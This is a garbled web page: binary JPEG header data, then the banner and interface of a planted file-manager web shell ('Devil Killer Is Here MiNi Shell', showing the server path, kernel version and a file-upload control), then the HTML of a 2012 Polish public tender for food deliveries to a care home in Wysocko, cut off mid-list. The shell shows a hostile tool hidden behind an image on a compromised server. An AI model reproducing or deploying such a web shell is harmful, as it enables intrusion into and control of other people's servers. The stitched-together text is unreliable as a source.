JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121207/498320-N-2012.html

<p class="kh_header"><b>Laszki: Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Wysocku w I półroczu 2013r.</b><br>
<b>Numer ogłoszenia: 498320 - 2012; data zamieszczenia: 07.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Wysocku , Wysocko 2, 37-543 Laszki, woj. podkarpackie, tel. 016 6285357.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Wysocku w I półroczu 2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest dostawa artykułów spożywczych do DPS w Wysocku
Określenie przedmiotu zamówienia: 
Przedmiot niniejszego zamówienia obejmuje dostawę artykułów spożywczych według Kodu CPV - 15.00.00.00-8 w następujących kategorii: 
Kategoria Nr 1 - dostawa WARZYWA, OWOCE I JAJA                                                                                                                                      
Kategoria Nr 2 - dostawa WĘDLIN I MIĘSA         
Kategoria Nr 3 - dostawa NABIAŁU                        
Kategoria Nr 4 - dostawa MROŻONEK I KONSERW RYBNYCH  
Kategoria Nr 5 - dostawa PIECZYWA                    
Kategoria Nr 6 - dostawa  POZOSTAŁYCH RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH, 
Zamawiający zastrzega sobie możliwość zmniejszenia ilości zamówionego towaru.
Zamawiający będzie składał Wykonawcy sukcesywne zamówienia przekazywane faxem lub telefonicznie  i potwierdzone faxem następnego dnia .
Zamówienie będzie składane z 2 - dniowym wyprzedzeniem przed ustalonym terminem dostawy. Osoba upoważnioną do składania zamówienia jest Starszy Magazynier.
Wykonawca dostarczy towar bez względu na wielkość zamówienia w ciągu 2 dni roboczych licząc od dnia otrzymania zamówienia.
Zamawiany towar Wykonawca dostarczać będzie na własny koszt do magazynu DPS w godz. od 
7 do 11.
Wykonawca zobowiązany jest dostarczyć zamówiony towar w opakowaniu zapewniającym odpowiednie warunki sanitarne oraz zabezpieczającym go przed zniszczeniem lub uszkodzeniem, transportem spełniającym wymagania higieniczno - sanitarne. Dla wyrobów mleczarskich i mięsa Wykonawca zobowiązuje się do zachowania tzw. Ciągu chłodniczego, tj. przechowywania i transportu wyrobów w urządzeniach spełniających warunki techniczne przewidziane w polskiej normie.
Zamawiający zobowiązany jest każdorazowo w obecności przedstawiciela Wykonawcy dokonać ilościowego i jakościowego odbioru towaru, który potwierdza przez pokwitowanie dowodu dostawy.
1.  Zamawiający zobowiązuje się do zbadania towaru podczas odbioru i dokona sprawdzenia :
         	1.1 Warunków transportu, w tym czystości środka transportu  opakowań i inne  
            warunki mające wpływ na jakość zdrowotną przewożonych artykułów oraz sposób   
            wyładowania zapobiegający ich zanieczyszczeniu
            1.2 Dokumentacji dotyczącej dostarczonych artykułów spożywczych , w tym  
             pochodzenia, producenta, daty produkcji i świadectwo kontroli jakości.
            1.3 Opakowań zbiorczych i jednostkowych: obce zapachy, uszkodzenia ,  
             zawilgocenie, bombaż puszek, obecności szkodników itp.
            1.4 Znakowania artykułów spożywczych, a zwłaszcza terminu przydatności                     
            do spożycia i daty minimalnej trwałości, czytelności i trwałości znakowania,
            1.5 Cech organoleptycznych, widocznych zanieczyszczeń, zapleśnienia,           
             szkodników itp.
 2.W przypadku niedochowania powyższych wymogów Wykonawca ma obowiązek    uznania reklamacji jakości dostarczonego towaru i na własny koszt jest zobowiązany wymienić towar na pełnowartościowy, nie budzący żadnych zastrzeżeń oraz w razie potrzeby zastosować inny środek transportu.                              2. Odpowiedzialność za dostarczany i odbierany towar określa moment odbioru towaru 
     ( przekazania)
3. W razie stwierdzenia braków Wykonawca uzupełni towar w tym samym dniu lub najpóźniej następnego dnia bez żadnej dopłaty.
4.  Wykonawca zobowiązuje się dostarczać towar dobrej jakości tj. świeży, I gatunku, czysty, bez obcych zapachów o właściwej gramaturze oraz z właściwym terminem przydatności do spożycia
5. Termin przydatności dostarczonego towaru ma być nie mniejszy niż 50 % całkowitego okresu przydatności do spożycia.
6. Towar będzie oznaczony zgodnie z obowiązującymi przepisami. Musi posiadać na opakowaniu opis i cechowanie określające jego właściwości. Opakowanie nie powinno wskazywać oznak uszkodzeń mechanicznych. Towar nie może wykazać oznak nieświeżości, przemrożenia bądź zepsucia.
7. W celu potwierdzenia jakości dostarczanego przez Wykonawcę towaru Wykonawca zobowiązany jest do przedłożenia Zamawiającemu dokumentacji dotyczącej artykułów spożywczych, określających w szczególności ich pochodzenie, producenta, datę produkcji, świadectwo kontroli jakości (Handlowy Dokument Identyfikacyjny)
8.   Brak wymaganych dokumentów wstrzymuje zapłatę za dostarczony towar.
9. W razie stwierdzenia przy odbiorze towaru , że nie odpowiada on zamówionemu asortymentowi lub nie spełnia norm jakościowych, zamawiający ma prawo odmówić jego odbioru, a Wykonawca zobowiązany jest niezwłocznie do dostarczenia nowego towaru.
10. W razie dostarczenia towaru złej jakości, której nie można było stwierdzić w trakcie odbioru towaru odbiorca ma prawo złożenia pisemnej lub telefonicznej reklamacji w ciągu 24 godzin od jego wykrycia, a Wykonawca jest zobowiązany wymienić reklamowany towar na wolny od wad..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.     O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający wymagania określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i nie podlegają wykluczeniu z udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 wyżej wymienionej ustawy.
 
2.	Wykonawca ubiegający się o udzielenie zamówienia musi spełniać warunki udziału w
postępowaniu dotyczące:
1)	posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadania niezbędnej wiedzy i doświadczenia, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy

3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków.
4.	Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych poniżej.
Oświadczenia i dokumenty, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu oraz w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia.
1.	W celu potwierdzenia, że Wykonawca spełnienia warunki udziału w postępowaniu o
zamówienie Zamawiający wymaga złożenia w ofercie następujących oświadczeń i
dokumentów:
1) Oświadczenie, że Wykonawca spełnia warunki w zakresie określonym w art. 22 ust. 1 ustawy Prawo zamówień publicznych, sporządzone według wzoru stanowiącego Załącznik Nr 4 do SIWZ;
2.	Jeśli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jednocześnie poleganie Wykonawcy na wiedzy i doświadczeniu innych podmiotów nierozerwalnie wiąże się z tym, że podmioty te będą realizowały część zamówienia jako podwykonawcy, a Wykonawca przedstawi pisemne zobowiązanie tych podmiotów do wykonywania części udzielanego zamówienia.

3.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24, ust. l ustawy Pzp Zamawiający wymaga złożenia w ofercie następujących oświadczeń i dokumentów:

1)	Oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania o Udzielenie zamówienia, sporządzone według wzoru stanowiącego Załącznik Nr 5 do SIWZ;
2)	Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy; sporządzone według wzoru (wzór Załącznik Nr 6 do SIWZ);
3)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał
przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 4)  Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
Polskiej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę
lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dostarczy artykuły spożywcze do magazynu DPS w Wysocku własnym transportem na własny koszt. Dostawy żywności muszą się odbywać zgodnie z zasadami HACCP ( GMP/GHP) przy użyciu odpowiednich środków transportowych dla artykułów wymagających niskich temperatur.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/dpswysocko<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Wysocku; 327-543 Laszki; powiat jarosławski; wij. podkarpackie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2012 godzina 09:00, miejsce: Dom Pomocy Społęcznej w Wysocku; 37-543 Laszki; Sekretariat-Budynek Administracyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WARZYWA, OWOCE I JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pietruszka	Kg	80
2.	Marchew	Kg	350
3.	Cebula	Kg	300
4.	Buraczki ćwikłowe	Kg	250
5.	Fasola  Jaś	Kg	30
6.	Kapusta czerwona	Kg	80
7.	Kapusta biała	Kg	250
8.	Ogórki kiszone	Kg	30
9.	Kapusta pekińska	Kg	150
10.	Pomidory	Kg	200
11.	Ogórek zielony	Kg	150
12.	Pory	Kg	140
13.	Natka pietruszki (pęczek)	Szt.	120
14.	Koperek zielony (pęczek)	Szt.	160
15.	Sałata zielona	Kg	50
16.	Seler	Kg	150
17.	Szczypiorek	Szt.	160
18.	Mak niebieski	Kg	2
19.	Papryka swieża	Kg	20
20.	Kapusta kiszona	Kg	140
21.	Pieczarki świeże	Kg	60
22.	Susz koperku (20 g)	Szt.	20
23.	Susz natki pietruszki 20 g	Szt.	20
24.	Czosnek	Kg	10
25.	Ziemniaki	Kg	3500
26.	Banany	Kg	300
27.	Pomarańcze	Kg	100
28.	Jabłka	Kg	500
29.	Cytryny	Kg	15
30.	Klementynki	Kg	200
31.	Jaja	Szt.	7500
32.	Żur naturalny (500g)	Szt.	100
33.	Brokuł świeży	Kg	100
34.	Śliwki	Kg	60
35.	Mandarynki	Kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.10.00-6, 03.22.00.00-9, 03.21.21.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WĘDLINY I MIĘSA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mrożonek i konserw rybnych w asortymencie i ilości: 1.	Szynka drobiowa	Kg	60
2.	Szynka wieprz. Extra	Kg	20
3.	Kiełbasa szynkowa wp. extra	Kg	80
4.	Kiełbasa zwyczajna	Kg	140
5.	Kiełbasa parówkowa	Kg	100
6.	Kiełbasa krakowska parzona	Kg	80
7.	Kiełbasa wiejska	Kg	30
8.	Kiełbasa lencz	Kg	90
9.	Kiszka gryczana wiejska	Kg	60
10.	Pieczeń myśliwska	Kg	120
11.	Pasztet luzem wp. delikatesowy	Kg	70
12.	Pasztetowa firmowa	Kg	80
13.	Salceson regionalny	Kg	80
14.	Smaczek konserwowy	Kg	100
15.	Szynka kanapkowa	Kg	80
16.	Boczek wędzony	Kg	25
17.	Baleron got. wieprz.	Kg	30
18.	Szynka konserwowa blok	Kg	80
19.	Polędwica wieprzowa mięso	Kg	60
20.	Karkówka wieprzowa bez kości	Kg	120
21.	Kości wieprzowe pokrzepowe	Kg	230
22.	Łopatka wp. b/k mięso	Kg	350
23.	Galareta wieprzowa	Kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.13.11.30-5, 15.13.11.35-0, 15.11.11.11-9, 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nabiału w asortymencie i ilości:
1.	Twaróg chudy	Kg	400
2.	Śmietana 18 % (450g)	Szt.	700
3.	Śmietana 18 % (500g)	Szt.	250
4.	Masło z olejem extra (200g)	Kg	120
5.	Ser żółty salami	Kg	100
6.	Ser topiony (100 g)	Szt.	1000
7.	Ser plastry (150 g)	Szt.	450
8.	Mleko pasteryzowane homogenizowane folia       2 %	L	3100
9.	Masło roślinne (500 g)	Kg	450
10.	Jogurt owocowy(125 g)	Szt.	2900
11.	Kefir (200g)	Szt.	1500
12.	Maślanka (1 l )	L	240
13.	Margaryna mleczna (250g)	Kg	140
14.	Jogurt naturalny (400g)	Szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.88.10.00-7, 15.43.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MROŻONKI I KONSERWY RYBNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mrożonek i konserw rybnych w asortymencie i ilości: 
1.	Śledź w pomidorach      ( 170 g konserwa )	Szt.	100
2.	Śledź w oleju                   ( 170 g konserwa )	Szt.	100
3.	Filety z makreli                ( 170 g konserwa )	Szt.	100
4.	Tuńczyk kawałki                         ( 185 g konserwa )	Szt.	250
5.	Fasolka szparagowa      ( 400 g mrożona)	Szt.	180
